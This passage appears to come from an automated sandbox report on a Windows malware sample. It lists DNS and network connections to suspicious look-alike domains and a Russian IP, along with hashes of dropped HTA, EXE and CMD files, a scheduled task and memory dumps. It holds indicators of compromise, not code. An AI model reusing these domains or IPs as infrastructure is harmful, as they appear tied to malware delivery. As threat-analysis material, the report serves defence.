| US | 8.8.8.8:53 | prod.content-signature-chains.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.pocket.prod.cloudops.mozgcp.net | udp |
| US | 8.8.8.8:53 | shavar.prod.mozaws.net | udp |
| US | 8.8.8.8:53 | shavar.prod.mozaws.net | udp |
| GB | 142.250.187.206:443 | youtube.com | udp |
| US | 8.8.8.8:53 | www.youtube.com | udp |
| N/A | 127.0.0.1:49650 | tcp | |
| N/A | 127.0.0.1:49656 | tcp | |
| GB | 142.250.187.238:443 | www.youtube.com | tcp |
| US | 8.8.8.8:53 | youtube-ui.l.google.com | udp |
| US | 8.8.8.8:53 | prod.remote-settings.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | youtube-ui.l.google.com | udp |
| GB | 142.250.187.238:443 | youtube-ui.l.google.com | udp |
| US | 8.8.8.8:53 | prod.remote-settings.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | consent.youtube.com | udp |
| GB | 216.58.213.14:443 | consent.youtube.com | tcp |
| US | 8.8.8.8:53 | consent.youtube.com | udp |
| US | 8.8.8.8:53 | consent.youtube.com | udp |
| US | 8.8.8.8:53 | firefox-settings-attachments.cdn.mozilla.net | udp |
| US | 34.107.152.202:443 | firefox-settings-attachments.cdn.mozilla.net | tcp |
| US | 8.8.8.8:53 | attachments.prod.remote-settings.prod.webservices.mozgcp.net | udp |
| GB | 216.58.213.14:443 | consent.youtube.com | udp |
| US | 8.8.8.8:53 | attachments.prod.remote-settings.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 216.58.204.68:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | www.google.com | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 216.58.204.68:443 | www.google.com | udp |
| US | 8.8.8.8:53 | consent.youtube.com | udp |
| US | 8.8.8.8:53 | consent.youtube.com | udp |
| US | 8.8.8.8:53 | towerbingobongoboom.com | udp |
| US | 213.209.150.137:4000 | towerbingobongoboom.com | tcp |
| US | 213.209.150.137:4266 | towerbingobongoboom.com | tcp |
| US | 8.8.8.8:53 | joyfulhezart.tech | udp |
| US | 8.8.8.8:53 | hardswarehub.today | udp |
| US | 8.8.8.8:53 | gadgethgfub.icu | udp |
| US | 8.8.8.8:53 | hardrwarehaven.run | udp |
| US | 8.8.8.8:53 | techmindzs.live | udp |
| US | 8.8.8.8:53 | codxefusion.top | udp |
| US | 172.67.212.102:443 | codxefusion.top | tcp |
| US | 8.8.8.8:53 | biochextryhub.bet | udp |
| US | 172.67.192.128:443 | biochextryhub.bet | tcp |
| US | 8.8.8.8:53 | play.google.com | udp |
| GB | 142.250.200.14:443 | play.google.com | tcp |
| US | 8.8.8.8:53 | play.google.com | udp |
| US | 8.8.8.8:53 | play.google.com | udp |
| GB | 142.250.200.14:443 | play.google.com | udp |
| US | 8.8.8.8:53 | circujitstorm.bet | udp |
| US | 8.8.8.8:53 | explorebieology.run | udp |
| US | 8.8.8.8:53 | moderzysics.top | udp |
| US | 172.67.189.66:443 | moderzysics.top | tcp |
| RU | 176.113.115.7:80 | 176.113.115.7 | tcp |
| DE | 5.75.210.149:443 | tcp | |
| GB | 216.58.213.14:443 | consent.youtube.com | udp |
| DE | 5.75.210.149:443 | tcp | |
| US | 8.8.8.8:53 | consent.youtube.com | udp |
| US | 8.8.8.8:53 | consent.youtube.com | udp |
Files
C:\Users\Admin\AppData\Local\Temp\eFSASVJL1.hta
| MD5 | 214ecd61b6d16ec0d47c54fc8f1d874c |
| SHA1 | 2ba8788b961a887b4578b7c3173b68de4ceeb285 |
| SHA256 | 0e4d41f19004b61605bc2b6bf11ff24272dfdb792c8090a63445dd0fa52cc42c |
| SHA512 | e14107749af4af7a0e3919a942b6c423a64b6de1fa554f69dea904d2352513dc06b50e889bbaeeaf6becaa9a4226150ce8de26b1c0a6181b0c1f67c1c7b40fb8 |
\Users\Admin\AppData\Local\TempOYDYK0OQRLM5YDLB8DCEE9MFD5X2FUUS.EXE
| MD5 | b5db83c03a37b4cd4746a6080133e338 |
| SHA1 | edf3f7e5c3bda89e1382df8f7d0443783426c834 |
| SHA256 | 8bf5d7ea5c499425488b94f13497a5c3b02997f00ec88fad1b577736fab245df |
| SHA512 | e99da7c87f01dc7459b57d0ce3df799aeb22738840f047c56fb319dc8edddc00ae303ca02916b4b09690df3ff14d559fac44b3e627c6b24498338cfa290fc313 |
memory/2924-13-0x0000000006540000-0x00000000069FF000-memory.dmp
memory/2924-12-0x0000000006540000-0x00000000069FF000-memory.dmp
memory/2588-15-0x0000000000CE0000-0x000000000119F000-memory.dmp
memory/2108-30-0x0000000000DA0000-0x000000000125F000-memory.dmp
memory/2588-28-0x0000000000CE0000-0x000000000119F000-memory.dmp
memory/2588-32-0x0000000000CE0000-0x000000000119F000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe
| MD5 | 73636685f823d103c54b30bc457c7f0d |
| SHA1 | 597dba03dce00cf6d30b082c80c8f9108ae90ccf |
| SHA256 | 1edc123e5a8ea5ce814e2759ee38453404d4af72a3577b0af55e8d99fa38ef1c |
| SHA512 | 183d4901a72afc044ef13c3a2cc21f93aefd954665f981c7886afc9019ca7d46f76b3459789dff5721542f2f9e7bbf606d7df68328e772e4c66dc789964f43f7 |
memory/2108-56-0x0000000000DA0000-0x000000000125F000-memory.dmp
memory/2108-57-0x0000000000DA0000-0x000000000125F000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe
| MD5 | 47177b7fbf1ce282fb87da80fd264b3f |
| SHA1 | d07d2f9624404fa882eb94ee108f222d76bbbd4c |
| SHA256 | e3a190fc0f3e2be612c896ad1bda174271ee57d493f1b39030de1cbb5b7090eb |
| SHA512 | 059db11d303355b85e94031a54b0e6bac30bc9e2475bf3fceb9c01063af6f593d455fb54f8893ca37a150b598a9863b04f37056ef589656a6e83da719b330db9 |
memory/2484-70-0x0000000000100000-0x0000000000110000-memory.dmp
C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe
| MD5 | 1dc908064451d5d79018241cea28bc2f |
| SHA1 | f0d9a7d23603e9dd3974ab15400f5ad3938d657a |
| SHA256 | d521f17349128cc6339aecb7a5e41f91ab02d338e5c722cd809d96c3a1c64454 |
| SHA512 | 6f072459376181f7ddb211cf615731289706e7d90b7c81e306c6cd5c79311544d0b4be946791ae4fad3c2c034901bc0a2fd5b2a710844e3fe928a92d1cc0814f |
memory/2240-88-0x00000000047D0000-0x0000000004C10000-memory.dmp
memory/600-87-0x0000000000400000-0x0000000000840000-memory.dmp
memory/2240-86-0x00000000047D0000-0x0000000004C10000-memory.dmp
\??\PIPE\srvsvc
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Temp\10107440101\cd0ae9eb0c.exe
| MD5 | 83cd4a3ac24bea5dd2388d852288c7de |
| SHA1 | 059245d06571b62c82b059a16b046793f6753dbc |
| SHA256 | a8bc81ff72efd02a4edf01f87d1f108886d80a2484a91e776a4e947b3f47bad1 |
| SHA512 | 5133d4638db05e87daaba1b5725ddaaddb434440e31a2241732dfcc21d3f8c03212f715171d990f0fd601eb926a8a0308b93f5d8139c697399a06e891725c31c |
C:\Users\Admin\AppData\Local\Temp\Bjuo1Ytnk.hta
| MD5 | fc9b37b45ee22ac3220b9e280bfa4cd4 |
| SHA1 | d005ba15e722aeb452630ebe8274457a978672a6 |
| SHA256 | d592c1b0ad7641e0b504272de671e47fe302e95b7ac79787d0e682f306142cb6 |
| SHA512 | 5c5a0466fcdda320464ede65bb8ad1e245f64a699242d7bb74dd949673bed836d426a53af9c6cb121a49bcad39bba7050536456b5655d191acbce2ee76367bfb |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
| MD5 | 5dc4cb488b998e7f96799fd8a4aade27 |
| SHA1 | aac3f7d78191710e2e85e80241e478b87a2e94dc |
| SHA256 | b5d8b4da36ddf0e01681abbe6084ed4b2a5d6a08f91c1985d2fe728c0ad19ef0 |
| SHA512 | bc965ab8ee90252237c1e5fbcc45f3ba9c750035e1657326d0f9ef8b379e12bbaac6dcfd51cc7269e12cfd2c3ae5d1128edfa398b68902582dbdcc7e9db8945f |
C:\Users\Admin\AppData\Local\Temp\10107450121\am_no.cmd
| MD5 | cedac8d9ac1fbd8d4cfc76ebe20d37f9 |
| SHA1 | b0db8b540841091f32a91fd8b7abcd81d9632802 |
| SHA256 | 5e951726842c371240a6af79d8da7170180f256df94eac5966c07f04ef4d120b |
| SHA512 | ce383ffef8c3c04983e752b7f201b5df2289af057e819cdf7310a55a295790935a70e6a0784a6fd1d6898564a3babab1ffcfbaa0cc0d36e5e042adeb3c293fa5 |
memory/2240-135-0x00000000047D0000-0x0000000004C10000-memory.dmp
memory/1516-133-0x0000000006520000-0x00000000069DF000-memory.dmp
memory/2392-134-0x0000000000090000-0x000000000054F000-memory.dmp
memory/2392-145-0x0000000000090000-0x000000000054F000-memory.dmp
memory/2108-146-0x0000000000DA0000-0x000000000125F000-memory.dmp
memory/600-147-0x0000000000400000-0x0000000000840000-memory.dmp
memory/2408-152-0x0000000000400000-0x0000000000840000-memory.dmp
memory/2240-151-0x00000000047D0000-0x0000000004C10000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
| MD5 | 2557dc784d8bed899da42bf62724cd5c |
| SHA1 | babf2ab1dd7624cad65b47f6bec76b8254b80c78 |
| SHA256 | f6d665e11a22e2e9b5682f69f3612659f4e72211aea2545d47f1183a6f6e8400 |
| SHA512 | a82b6aea76599ee61099d94babea87005f4e748a3ca673d795257689375194a2c8f3ca644f705d9a7271906b4a7cde438fa65abb25917541db447ee9331a31a9 |
C:\Windows\Tasks\Test Task17.job
| MD5 | dc66cb3280e093e23914366564673875 |
| SHA1 | 2a737c4f5a73c37f2768a432d53e0de190fc6292 |
| SHA256 | c0f7a76f80ed92e1aaeabcf1355be95d5f8e6e0064a1b96f6be3d7df978f259b |
| SHA512 | 3e58e3c1cf14dd3c1be6a69b6379edb2a8e8aa678bd29cc3e7776b97f8fb876d4cc8f72bb6e68a7246b79697bf5c91e0f765ad628f172c40dd8f18f37fd365af |
C:\Temp\GH8RmsOFg.hta
| MD5 | 39c8cd50176057af3728802964f92d49 |
| SHA1 | 68fc10a10997d7ad00142fc0de393fe3500c8017 |
| SHA256 | f685edf8437c0b505f5e366d8b1cb79e7770361cc4906240e7f8c8ad32c94e84 |
| SHA512 | cf563b2b5a3553acf3a91298936b904abf87620c2fc582bcdb45dec5d4b877bef5ae81feae4b741e1aee1a916e543b5f6914d9c494d2aa33bc6f15c6fc904cc6 |
memory/600-177-0x0000000000400000-0x0000000000840000-memory.dmp
memory/3032-186-0x00000000066C0000-0x0000000006B7F000-memory.dmp
memory/900-188-0x0000000000E80000-0x000000000133F000-memory.dmp
memory/900-189-0x0000000000E80000-0x000000000133F000-memory.dmp
memory/2408-190-0x0000000000400000-0x0000000000840000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10107670101\cd4e8b5947.exe
| MD5 | 6afaf17077308fa040a656dc9e7d15ed |
| SHA1 | df7caf0b424dc62a60dfb64f585c111448c0c1e3 |
| SHA256 | 42c07ef38b42451a7b1717dff97266f615f2e5cedab1c5c5827dbe3e6d9f69b0 |
| SHA512 | cd459aa3bc462822a61a9f3e943aef48e9e332661c562c39bd92388be1544f034afef9f5f02315b5bce5419564ed4f3fb94e76efcb4422fdd7775aeb011be986 |
memory/2108-206-0x0000000006BC0000-0x00000000075CD000-memory.dmp
memory/2108-201-0x0000000000DA0000-0x000000000125F000-memory.dmp
memory/2108-208-0x0000000006BC0000-0x00000000075CD000-memory.dmp
memory/2408-209-0x0000000000400000-0x0000000000840000-memory.dmp
memory/600-210-0x0000000000400000-0x0000000000840000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10107680101\9cab6ad180.exe
| MD5 | c83ea72877981be2d651f27b0b56efec |
| SHA1 | 8d79c3cd3d04165b5cd5c43d6f628359940709a7 |
| SHA256 | 13783c2615668fba4a503cbefdc18f8bc3d10d311d8dfe12f8f89868ed520482 |
| SHA512 | d212c563fdce1092d6d29e03928f142807c465ecaaead4fe9d8949b6f36184b8d067a830361559d59fc00d3bbe88feda03d67b549d54f0ec268e9e75698c1dd0 |
memory/1532-224-0x0000000000D00000-0x0000000000D78000-memory.dmp
memory/1688-240-0x0000000000400000-0x0000000000465000-memory.dmp
memory/1688-238-0x0000000000400000-0x0000000000465000-memory.dmp
memory/1688-237-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp
memory/1688-233-0x0000000000400000-0x0000000000465000-memory.dmp
memory/1688-231-0x0000000000400000-0x0000000000465000-memory.dmp
memory/1688-229-0x0000000000400000-0x0000000000465000-memory.dmp
memory/1688-227-0x0000000000400000-0x0000000000465000-memory.dmp
memory/1688-235-0x0000000000400000-0x0000000000465000-memory.dmp
memory/2108-251-0x0000000006BC0000-0x00000000075CD000-memory.dmp
memory/2108-252-0x0000000000DA0000-0x000000000125F000-memory.dmp
memory/2144-253-0x00000000000E0000-0x0000000000AED000-memory.dmp
memory/1420-254-0x0000000000400000-0x000000000042F000-memory.dmp
memory/2408-255-0x0000000000400000-0x0000000000840000-memory.dmp
memory/1420-257-0x0000000000400000-0x000000000042F000-memory.dmp
memory/2144-256-0x00000000000E0000-0x0000000000AED000-memory.dmp
memory/600-260-0x0000000000400000-0x0000000000840000-memory.dmp
memory/1420-262-0x0000000010000000-0x000000001001C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10107690101\cb98fa6f53.exe
| MD5 | 5d153f73ce1b6a907cf87ddb04ba12b2 |
| SHA1 | bfda9ee8501ae0ca60f8e1803efea482085bf699 |
| SHA256 | 2af376f6a5d706982e3ac08f54d737c4c203bdc2c2c1cbf5f9fc9d4a3a775b2c |
| SHA512 | 0f6ef7ff7db227bec5d2a1dcef461313cde66b5ec38f5efd377e533ef15d87eb4aef6cf387ee7c7b63d1142a883bb18577f97dec0dcd818b93891e87f499c102 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\K3VL8XEP\service[1].htm
| MD5 | cfcd208495d565ef66e7dff9f98764da |
| SHA1 | b6589fc6ab0dc82cf12099d1c2d40ab994e8410c |
| SHA256 | 5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9 |
| SHA512 | 31bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99 |
memory/2108-282-0x0000000000DA0000-0x000000000125F000-memory.dmp
memory/2408-283-0x0000000000400000-0x0000000000840000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10107700101\c77bb98cda.exe
| MD5 | 8538c195a09066478922511ea1a02edf |
| SHA1 | 15e8910df845d897b4bb163caef4c6112570855b |
| SHA256 | d5008972ddedb199731712f9fef3b3aa5a5cd666b600136a9da84656739d4e96 |
| SHA512 | 60b2c66006b226140f7bf50c94c65088081b311ee92c6dea376a1349ff2380e0ce053a84b2df3be8a54bf7f7bb76f1add8417f4f1bf2fb0681e008cbd5b1725c |
memory/600-297-0x0000000000400000-0x0000000000840000-memory.dmp
memory/2508-299-0x0000000001170000-0x0000000001DC1000-memory.dmp
memory/1572-302-0x0000000000400000-0x000000000042F000-memory.dmp
memory/2508-301-0x0000000001170000-0x0000000001DC1000-memory.dmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
| MD5 | 83142242e97b8953c386f988aa694e4a |
| SHA1 | 833ed12fc15b356136dcdd27c61a50f59c5c7d50 |
| SHA256 | d72761e1a334a754ce8250e3af7ea4bf25301040929fd88cf9e50b4a9197d755 |
| SHA512 | bb6da177bd16d163f377d9b4c63f6d535804137887684c113cc2f643ceab4f34338c06b5a29213c23d375e95d22ef417eac928822dfb3688ce9e2de9d5242d10 |
C:\Users\Admin\AppData\Local\Temp\TarF455.tmp
| MD5 | 109cab5505f5e065b63d01361467a83b |
| SHA1 | 4ed78955b9272a9ed689b51bf2bf4a86a25e53fc |
| SHA256 | ea6b7f51e85835c09259d9475a7d246c3e764ad67c449673f9dc97172c351673 |
| SHA512 | 753a6da5d6889dd52f40208e37f2b8c185805ef81148682b269fff5aa84a46d710fe0ebfe05bce625da2e801e1c26745998a41266fa36bf47bc088a224d730cc |
memory/1780-376-0x00000000008E0000-0x0000000000D8B000-memory.dmp
memory/2108-377-0x0000000000DA0000-0x000000000125F000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10107710101\51a7d2c853.exe
| MD5 | 2a48e7b047c5ff096c6dce52d4f26dbb |
| SHA1 | e0d61e10b27131b1c34ade44d1a2117afd2cf099 |
| SHA256 | 42642893c6a6af226aab5b2cce0875e7affebf7d1001146ddd90234d4c01492d |
| SHA512 | 75965d3aa7cda41ecc11f87b1ac2b12283d58650f5b96f2af560aff859ca74c0c0cb26dfc765b4d8318291d8f89fdbb338fb71ddf3f4b63389aedb5e2106165a |
memory/2408-392-0x0000000000400000-0x0000000000840000-memory.dmp
memory/2836-393-0x0000000000D60000-0x0000000001074000-memory.dmp
memory/600-396-0x0000000000400000-0x0000000000840000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10107720101\65ac27f01e.exe
| MD5 | 338a31056b3b81d48a292a7bf9af67c7 |
| SHA1 | f5061e3583ba604b25e316f12fc58f40238d44b4 |
| SHA256 | cd1c085a07dc81e4305c2b9ee57e5c0433858c97cb20b1743cf44931c431ccea |
| SHA512 | 5bc7823cbd1ab6fa963df8f152d8b6de56af41159f3a736d147f1e5b4dcba3007319e2d2fb13e97f1e8b3cce3ab0d17e31d541be1ab53f8bd05a42316a940abc |
memory/2664-420-0x00000000008D0000-0x0000000000F57000-memory.dmp
memory/2108-422-0x0000000000DA0000-0x000000000125F000-memory.dmp
memory/2408-424-0x0000000000400000-0x0000000000840000-memory.dmp
memory/600-425-0x0000000000400000-0x0000000000840000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10107730101\ef30a65d57.exe
| MD5 | c0caf5a901b162b6792eab9697827b5d |
| SHA1 | d078ba4ad104c40bf5f2c8afda1cbdf4afc55a84 |
| SHA256 | 28c182baea1726c3e851405b13f130e02817099758abab86ca9cdc3607b9f89f |
| SHA512 | 3fba4eb7a2bc21fc24a6e29495e598efc5f208db030b13de8af43a392a93e3a920e4e8e4b68e10d4dc4a0e8779401ca738172ca9cba2ddc2246854c41a8a58a5 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bhg31lui.default-release\datareporting\glean\db\data.safe.bin
| MD5 | 26216b4696bea895c77f97ec8b2a34b7 |
| SHA1 | 6e6ff86cf5fa96b879f6903f3c8d439ca045ed51 |
| SHA256 | f8a19700888258aa1614eb7ee793f3e8e1ef5dd384cc6c5712e79c29075be16f |
| SHA512 | 61c19fd8ad715efdd4b73c2287cfa9dc2de45d478707db86afcbf0cf88d9f1fc5a5aabdf267bfed24babef55813c912d26a688adbe68402b1c70786f4f2e7e87 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bhg31lui.default-release\datareporting\glean\pending_pings\c518fcca-1407-49d2-acce-963862a8da65
| MD5 | 968d571b2774dcc7a20b3ac02a1d0e34 |
| SHA1 | fca77952eae22f5ad0a2add88ca78fcdf77e0988 |
| SHA256 | b4d0d50aca4e94b5f12185d800f5189accf01bd4a97f598b79c6ff6678a1a046 |
| SHA512 | b69fbc7f651257ddac083b2b5fc342d245bc92378bd9bdaf75cb8b33c84cb57c30234dce5505da96ba92b2f52c9fd182649f91b1b2b846d1a4f0e2032e4f7275 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bhg31lui.default-release\datareporting\glean\pending_pings\5ec7a57a-29aa-4f0d-b37b-c846b96d1281
| MD5 | 275afce8f8bd93608b272b906aeebdf7 |
| SHA1 | e223d02e3f98621bf4d7b9299420f5abed3f5468 |
| SHA256 | 2afd0138376f9c4fd55a80295e1b8aa428325d3532f9eabec21735f589be7cb5 |
| SHA512 | 21aabeec972952c7098ed76943558bc27c80664e3c6a7ad2d885878477dc72e89674c260f517ba552b0730cf47edad4e6c86575241f0cfe825e70f1cd51248a7 |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\bhg31lui.default-release\activity-stream.discovery_stream.json.tmp
| MD5 | e532ed9d9b666bc6827ad24488568157 |
| SHA1 | b34c35ba2b99c5e0eed8df9f8854db3a4825def4 |
| SHA256 | 8307aed41502e0ae7d75fddcdcbc1d4547027d19b399d9f2121eac4819c21a85 |
| SHA512 | e83fd72d66d1cd2eb8e2e3e1919b8814979c073c1076827c95fc8307ea34f91f8c30208d572bd9eeb4f3ef2d888eea8f7d5101bc02ff09800bfd5bba2ab73e12 |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\bhg31lui.default-release\settings\main\ms-language-packs\browser\newtab\asrouter.ftl
| MD5 | 96c542dec016d9ec1ecc4dddfcbaac66 |
| SHA1 | 6199f7648bb744efa58acf7b96fee85d938389e4 |
| SHA256 | 7f32769d6bb4e875f58ceb9e2fbfdc9bd6b82397eca7a4c5230b0786e68f1798 |
| SHA512 | cda2f159c3565bc636e0523c893b293109de2717142871b1ec78f335c12bad96fc3f62bcf56a1a88abdeed2ac3f3e5e9a008b45e24d713e13c23103acc15e658 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bhg31lui.default-release\prefs.js
| MD5 | 3224541ee499b1f30ea80393ab279d34 |
| SHA1 | a29eec2b9a9737651011649a620f51f89cdab692 |
| SHA256 | 044e793993eeff6f292c87a71fde6453c9b13647b7c34c6015ed8f59d902b9c1 |
| SHA512 | f40bc72c0e85d50646f598fd027a8ee9cf624003d885b242d483abc45672234fcea180fced567bf76648c16d6ae488ff8a740aef4c8c0c0ca24555ec74c4fe07 |
memory/2108-587-0x0000000000DA0000-0x000000000125F000-memory.dmp
memory/2408-588-0x0000000000400000-0x0000000000840000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10107740101\e6410dd2f6.exe
| MD5 | 8043b20e32ff2f0c75e9a3eed0c4bf07 |
| SHA1 | 5464aa1bc2a91c64cd8c4cbbb6970e8189c158a3 |
| SHA256 | 69a487512dfb97f08d068d0f9dd3924f42bef46bddd79112cb206b00fc16713e |
| SHA512 | 35639c6aad3dd25f606ca72ad108f774b083fa62677772242d357d59add9bba1dc85532d58ae67277d90c04dd4a5189548ca331fe93ee086c31cacbf11b8a18c |
memory/3500-607-0x00000000008F0000-0x0000000000D48000-memory.dmp
memory/3500-608-0x00000000008F0000-0x0000000000D48000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\IAE3FJ0M\soft[1]
| MD5 | f49d1aaae28b92052e997480c504aa3b |
| SHA1 | a422f6403847405cee6068f3394bb151d8591fb5 |
| SHA256 | 81e31780a5f2078284b011c720261797eb8dd85e1b95a657dbce7ac31e9df1f0 |
| SHA512 | 41f715eea031fd8d7d3a22d88e0199277db2f86be73f830819288c0f0665e81a314be6d356fdc66069cb3f2abf0dd02aaa49ac3732f3f44a533fcec0dfd6f773 |
C:\Users\Admin\AppData\Local\Temp\10107750101\zY9sqWs.exe
| MD5 | 2bb133c52b30e2b6b3608fdc5e7d7a22 |
| SHA1 | fcb19512b31d9ece1bbe637fe18f8caf257f0a00 |
| SHA256 | b8e02f2bc0ffb42e8cf28e37a26d8d825f639079bf6d948f8debab6440ee5630 |
| SHA512 | 73229885f8bf4aace4671b819a8487f36acb7878cd309bdf80b998b0a63584f3063364d192b1fc26fa71b9664908fe290a00f6898350c30f40d5f2a2d2efe51f |
memory/2108-637-0x0000000000DA0000-0x000000000125F000-memory.dmp
memory/2408-638-0x0000000000400000-0x0000000000840000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10107760101\PcAIvJ0.exe
| MD5 | 5b3ed060facb9d57d8d0539084686870 |
| SHA1 | 9cae8c44e44605d02902c29519ea4700b4906c76 |
| SHA256 | 7c711ab33a034ed733b18b76a0154c56065c74a9481cbd0e4f65aa2b03c8a207 |
| SHA512 | 6733ae1c74c759031fb2de99beb938f94fc77ed8cc3b42b2b1d24a597f9e74eeab5289f801407619485f81fccaa55546344773e9a71b40b1af6b3c767b69e71a |
memory/3928-655-0x000000001B620000-0x000000001B902000-memory.dmp
memory/3928-656-0x0000000001E80000-0x0000000001E88000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\B4440P9RCO6GVIR8HWV3.temp
| MD5 | e14a3a6130eea99fc9d4dab7bc2f8585 |
| SHA1 | 13c5150d1a5b53a0a8fc5f66889f1ff2d051b998 |
| SHA256 | d5c25e590f6d950b06baedbddb412bb6c510d79c31d7b782c92b7b8efff938aa |
| SHA512 | 29e4e0d9766be0ffa5787ff89cef5dfc1fd926f762ac194af5689ec1ea35a730a392aa8031aff8c2e666a9be6647413853d3bae71513ed19d2ffd6e95245c9ff |
memory/4016-663-0x000000001B4F0000-0x000000001B7D2000-memory.dmp
memory/4016-664-0x0000000002070000-0x0000000002078000-memory.dmp
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bhg31lui.default-release\sessionstore-backups\recovery.jsonlz4
| MD5 | 705d4552cb12e4353a7856d4e055653f |
| SHA1 | db37fa7b6e9183bcb9ddb35ab77aa308f504aac0 |
| SHA256 | 44eb8180c62f9c60d2bc76d32fec4e93de8e4b1c11d26cdcdb68f9429e308374 |
| SHA512 | 01effe006b306f0d6d456cc268cc3bf3c35761e6e4e5e3487e348e450f3aed78cf17e840e756c09accac4c923bd97186521fc081a1162b75d4669ddbfc90ca45 |
memory/2108-671-0x0000000000DA0000-0x000000000125F000-memory.dmp
memory/2408-672-0x0000000000400000-0x0000000000840000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10107770101\v6Oqdnc.exe
| MD5 | 6006ae409307acc35ca6d0926b0f8685 |
| SHA1 | abd6c5a44730270ae9f2fce698c0f5d2594eac2f |
| SHA256 | a5fa1579a8c1a1d4e89221619d037b6f8275f34546ed44a020f5dfcee3710f0b |
| SHA512 | b2c47b02c972f63915e2e45bb83814c7706b392f55ad6144edb354c7ee309768a38528af7fa7aeadb5b05638c0fd55faa734212d3a657cd08b7500838135e718 |
memory/3420-685-0x0000000000FE0000-0x000000000147B000-memory.dmp
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bhg31lui.default-release\prefs.js
| MD5 | 42a55ffa2ffbc63efcb06872e64786f3 |
| SHA1 | 5cdee127d3bfd6d9f3548cc2c31e7b4f7a96587e |
| SHA256 | 579816094a6f2e79199c4b58a949b030a88273364115d6e6a888ad09e6194412 |
| SHA512 | ab48b0830c379040e1e847e9f7e31062850ac97a9760a0dfc3c7edd4688f7124c335f10572a58d789f46e263baefb6b593b0274da32d2b23dd95e2dce2110eea |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bhg31lui.default-release\prefs-1.js
| MD5 | ec2d52962eeec7c1d536013b9b3e4399 |
| SHA1 | 89dde681ca7fcd89e856b3403c27252b06a13f54 |
| SHA256 | 776b553b4a2416d7994741b9231bafe346456203eab25d2ac318199b805f8015 |
| SHA512 | 6608fd089b0067ef4c61c1ed5323f4cce4b72f538d4f965ab020ee030f2a801d58dc313791714ea1b9f14358b1bac541dc0911247461ca89e7a9fa46feebf00b |
memory/2108-696-0x0000000000DA0000-0x000000000125F000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10107780101\MCxU5Fj.exe
| MD5 | 641525fe17d5e9d483988eff400ad129 |
| SHA1 | 8104fa08cfcc9066df3d16bfa1ebe119668c9097 |
| SHA256 | 7a87b801af709e8e510140f0f9523057793e7883ec2b6a4eab90fcf0ec20fd4a |
| SHA512 | ee92bc34e21bb68aeda20b237e8b8e27f95e4cc44f5fd9743b52079c40f193cc342f8bb2690fd7ab3624e1690979118bd2e00a46bda3052cbd76bc379b87407e |
memory/3800-707-0x0000000000FD0000-0x0000000001040000-memory.dmp
memory/896-721-0x0000000000400000-0x0000000000466000-memory.dmp
memory/896-712-0x0000000000400000-0x0000000000466000-memory.dmp
memory/896-709-0x0000000000400000-0x0000000000466000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10107790101\ce4pMzk.exe
| MD5 | d39df45e0030e02f7e5035386244a523 |
| SHA1 | 9ae72545a0b6004cdab34f56031dc1c8aa146cc9 |
| SHA256 | df468fc510aec82c827987f54b824b978dd71301f93d18d71e704727d6dfdfa2 |
| SHA512 | 69866ba5b53d1183a0899e3d22ff06111ae2e8df429beeb853c89f3ed0afb015dd4139b1c507566ffb0fe171a4ff1b318247b7a568dc492d9f71266f5c848a64 |
memory/3504-732-0x0000000000830000-0x0000000000842000-memory.dmp
memory/3504-733-0x0000000000240000-0x0000000000250000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10107800101\mAtJWNv.exe
| MD5 | b60779fb424958088a559fdfd6f535c2 |
| SHA1 | bcea427b20d2f55c6372772668c1d6818c7328c9 |
